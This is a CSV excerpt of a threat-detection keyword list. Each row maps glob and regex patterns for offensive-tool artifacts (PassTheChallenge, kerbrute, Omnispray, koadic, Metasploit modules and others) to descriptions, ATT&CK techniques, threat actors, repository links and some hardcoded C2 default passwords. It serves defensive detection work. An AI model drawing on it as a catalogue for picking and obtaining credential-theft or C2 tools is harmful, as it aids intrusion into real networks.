"*Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)*",".{0,1000}Pass\-the\-Challenge\s\(PtC\)\s\-\sby\sOliver\sLyak\s\(ly4k\).{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54434"
"*PassTheChallenge.cpp*",".{0,1000}PassTheChallenge\.cpp.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54435"
"*PassTheChallenge.exe*",".{0,1000}PassTheChallenge\.exe.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54436"
"*PassTheChallenge.pdb*",".{0,1000}PassTheChallenge\.pdb.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54437"
"*PassTheChallenge.sln*",".{0,1000}PassTheChallenge\.sln.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54438"
"*PassTheChallenge.vcxproj*",".{0,1000}PassTheChallenge\.vcxproj.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54439"
"*PassTheHash(*",".{0,1000}PassTheHash\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","54440"
"*passthehashbrowns/BOFMask*",".{0,1000}passthehashbrowns\/BOFMask.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","54441"
"*passthehashbrowns/SharpRDPThief*",".{0,1000}passthehashbrowns\/SharpRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","54442"
"*passware-kit-forensic.sls*",".{0,1000}passware\-kit\-forensic\.sls.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54443"
"*PasswareKitForensic_*_Setup.dmg*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.dmg.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","#macos","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54444"
"*PasswareKitForensic_*_Setup.msi*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.msi.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54445"
"*passware-kit-forensic-64bit.msi*",".{0,1000}passware\-kit\-forensic\-64bit\.msi.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54446"
"*PASSWORD = ""Letmein123!*",".{0,1000}PASSWORD\s\=\s\""Letmein123!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","54448"
"*password = 'b4bysh4rk'*",".{0,1000}password\s\=\s\'b4bysh4rk\'.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","54449"
"*password = 'tdragon6'*",".{0,1000}password\s\=\s\'tdragon6\'.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","54450"
"*Password confirmed. \nPoshito is welcoming you*",".{0,1000}Password\sconfirmed\.\s\\nPoshito\sis\swelcoming\syou.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#content","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","54451"
"*Password Spraying EAS at https://*",".{0,1000}Password\sSpraying\sEAS\sat\shttps\:\/\/.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","54452"
"*Password spraying lockout policy reset time *",".{0,1000}Password\sspraying\slockout\spolicy\sreset\stime\s.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54453"
"*Password spraying the following passwords: *",".{0,1000}Password\sspraying\sthe\sfollowing\spasswords\:\s.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54454"
"*Password spraying using paired usernames:passwords*",".{0,1000}Password\sspraying\susing\spaired\susernames\:passwords.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","54455"
"*Password to use for ADWS Connection*",".{0,1000}Password\sto\suse\sfor\sADWS\sConnection.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","54456"
"*Password*S0urce0fThePr0blem*",".{0,1000}Password.{0,1000}S0urce0fThePr0blem.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","54457"
"*Password*S3cr3tS3rvic3*",".{0,1000}Password.{0,1000}S3cr3tS3rvic3.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","54458"
"*Password*Winter2017*",".{0,1000}Password.{0,1000}Winter2017.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","54459"
"*Password: socksPass*",".{0,1000}Password\:\ssocksPass.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","54460"
"*Password:Waza1234*",".{0,1000}Password\:Waza1234.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","54461"
"*password_box.py*",".{0,1000}password_box\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","54462"
"*password_cracker.rb*",".{0,1000}password_cracker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54463"
"*password_crackers*",".{0,1000}password_crackers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54464"
"*Password_Cracking.sh*",".{0,1000}Password_Cracking\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","54465"
"*password_prompt_spoof.md*",".{0,1000}password_prompt_spoof\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54466"
"*password|passwort|passwd|*",".{0,1000}password\|passwort\|passwd\|.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","54467"
"*password|pwd|creds|cred|secret|userpw*",".{0,1000}password\|pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54468"
"*PASSWORD=miniosecret*",".{0,1000}PASSWORD\=miniosecret.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","54469"
"*PasswordBoxImplant*",".{0,1000}PasswordBoxImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","54470"
"*Password-Default/service.txt*",".{0,1000}Password\-Default\/service\.txt.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","54471"
"*passwordfox.exe*",".{0,1000}passwordfox\.exe.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54472"
"*passwordfox.zip*",".{0,1000}passwordfox\.zip.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54473"
"*passwordfox-x64.zip*",".{0,1000}passwordfox\-x64\.zip.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54474"
"*PasswordHashesView.exe*",".{0,1000}PasswordHashesView\.exe.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","54475"
"*passwordhashesview.zip*",".{0,1000}passwordhashesview\.zip.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","54476"
"*passwordhashesview-x64.zip*",".{0,1000}passwordhashesview\-x64\.zip.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","54477"
"*password-hijaker.exe*",".{0,1000}password\-hijaker\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","54478"
"*Passwords stolen and saved successfully!*",".{0,1000}Passwords\sstolen\sand\ssaved\ssuccessfully!.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","54479"
"*Passwords to users complete. Please see cracked-users.txt*",".{0,1000}Passwords\sto\susers\scomplete\.\sPlease\ssee\scracked\-users\.txt.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","54480"
"*Passwords/Leaked-Databases*.txt*",".{0,1000}Passwords\/Leaked\-Databases.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","54481"
"*Passwords_in_description.txt*",".{0,1000}Passwords_in_description\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","54482"
"*Password-Scripts*",".{0,1000}Password\-Scripts.{0,1000}","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","N/A","2","108","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z","54483"
"*PasswordSpray *",".{0,1000}PasswordSpray\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","N/A","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","54484"
"*passwordspray*--user-as-pass*",".{0,1000}passwordspray.{0,1000}\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","54485"
"*passwordspray.go*",".{0,1000}passwordspray\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","54486"
"*passwordSprayCmd*",".{0,1000}passwordSprayCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","54487"
"*Paste this link - https://akira*",".{0,1000}Paste\sthis\slink\s\-\shttps\:\/\/akira.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","54488"
"*pastehakk_generate*",".{0,1000}pastehakk_generate.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #content","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","54497"
"*patator ftp_login host=* user=FILE0 0=*.txt *",".{0,1000}patator\sftp_login\shost\=.{0,1000}\suser\=FILE0\s0\=.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54498"
"*patator*",".{0,1000}patator.{0,1000}","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","Dispossessor","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","10","3704","808","2025-02-17T11:00:36Z","2014-08-25T00:56:21Z","54499"
"*Patch-AMSI.*",".{0,1000}Patch\-AMSI\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","54500"
